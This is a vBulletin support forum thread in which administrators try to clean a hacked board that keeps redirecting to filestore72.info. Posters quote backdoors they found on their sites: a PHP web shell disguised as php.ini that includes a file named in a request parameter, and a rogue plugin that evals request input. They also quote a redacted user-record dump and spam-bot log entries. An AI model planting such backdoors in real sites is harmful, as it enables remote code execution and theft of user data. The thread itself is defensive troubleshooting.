Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info

Collapse
X
 
  • Time
  • Show
Clear All
new posts

  • BirdOPrey5
    replied
    Yes, I would uninstall VBSEO

    VBSEO is down but luckily the uninstall instructions with the URL Rewrite rules so links don't break is still available in the "Way Back" machine - http://web.archive.org/web/201301221...all-vbseo-238/

    Leave a comment:


  • RichieBoy67
    replied
    I have done the best I can to make it secure but my advice would be to remove that old version. What do you think Joe? I always value your opinions.

    Thanks

    Leave a comment:


  • BirdOPrey5
    replied
    There is no patch I have ever seen.

    Leave a comment:


  • RichieBoy67
    replied
    Hey guys, I am working on a client site with a similar issue and I believe it is tied to the use of Vbseo 3.6. He is using Vbulletin 4.2 but still has Vbseo 3.6 and seeing as Vbseo no longer exists he has no way to get the latest version. Is there a patch available to fix this without doing an upgrade?

    Thanks

    Leave a comment:


  • PET
    replied
    up.

    I deleted that PHP.INI.

    I aso found a new my.log file on the root.

    Leave a comment:


  • PET
    replied
    Ok I'm digging deeper.

    I just found a file called my.log in the root of the forum. It contains 2 users info ... like this:

    Code:
    Array
    (
        [userid] => 11582
        [usergroupid] => 25
        [membergroupids] =>
        [infractiongroupids] =>
        [username] => username here
        [password] => password here
        [salt] => salt code here
        [email] => email.address.here
    )
    Error log file is full of entries like this:

    Code:
    [Sun Nov 10 06:36:29 2013] [error] [client 178.151.216.90] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.censored.de/index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;
    [Sun Nov 10 06:37:26 2013] [error] [client 74.91.17.226] (36)File name too long: access to /index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+"bamilesqshuzea3914";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1;+Result:+chosen+nickname+"bjnessdark9685";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1; failed, referer: http://forum.censored/index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+%22bamilesqshuzea3914%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;+Result:+chosen+nickname+%22bjnessdark9685%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;
    I also have a php.ini file in my forum root that has this:

    Code:
    <?
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["file"]);
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["ss"]);
    ?>

    Leave a comment:


  • Lynne
    replied
    Have you looked through your access_logs to see what is going on?

    Leave a comment:


  • PET
    replied
    1. They are ok. No one who should not have access, is getting access.
    2. We had one 3 months ago that we deleted, that one probably gained access trough some PHP Root files I found and deleted.
    4. I went to each of them disable them one by one.

    Filestore still comes back after 1-2 days. Really no idea what to do.

    vBulletin is running 4.2.1 (yes I know there is a 4.2.2)
    All old vB files got deleted. All extra PHP files got deleted.
    Fond some PHP Root files in Attachment folders all got deleted.
    I protected the 777 folders.
    Checked the template

    So no rogue admins, no root php files.

    Filestore still comes back.



    Thanks

    Leave a comment:


  • Mark.B
    replied
    Change your admin passwords.
    Check for any admins you don't recognise.
    Password protect your admincp folder using .htaccess
    Go through each plug in and delete any that you don't recognise.

    If you're still having problems after that, please start your own topic with full details of the problem.

    Leave a comment:


  • PET
    replied
    Ok my problem persists. Any ideas?

    I don't use vBSEO. I have disabled plugins one by one. The filestore hack always come back after 1-2 days.

    Leave a comment:


  • PET
    replied
    Ok. I'm also posting here. Same problem. Not vbSEO installed. Did everything from what's been suggested. The filestore problem still persists even after the upgrade.

    I'm looking into plugins and I see this:
    A Plugin Named: 123
    Product: vBulletin
    Hook Location: faq_complete

    This is the code:

    Code:
    eval(stripslashes($_REQUEST[ass]));
    No idea what this is so I just deactivated.


    Do you have any ideas on how to fix this? It keeps coming back.

    Leave a comment:


  • BirdOPrey5
    replied
    Look at the links in Post # 3, and update VBSEO.

    To clear the current infection just go to the Admin CP -> Plugins & Products -> Product Manager and DISABLE then Re-Enable any product listed. This will force a refresh of the datastore which is where the code usually is.

    Leave a comment:


  • postcd
    replied
    Im having same issue

    Leave a comment:


  • EliasAlucard
    replied
    Originally posted by Zachery
    Any third party addons can have exploits, we don't track those. And unless the addon developer gets a notification about them, they might not be fixed.
    But do all third party addons ALWAYS have exploits? I'm trying to pinpoint the plugins we have in common here, if the exploit is actually in the plugin

    Leave a comment:


  • Zachery
    replied
    Any third party addons can have exploits, we don't track those. And unless the addon developer gets a notification about them, they might not be fixed.

    Leave a comment:

Related Topics

Collapse

Working...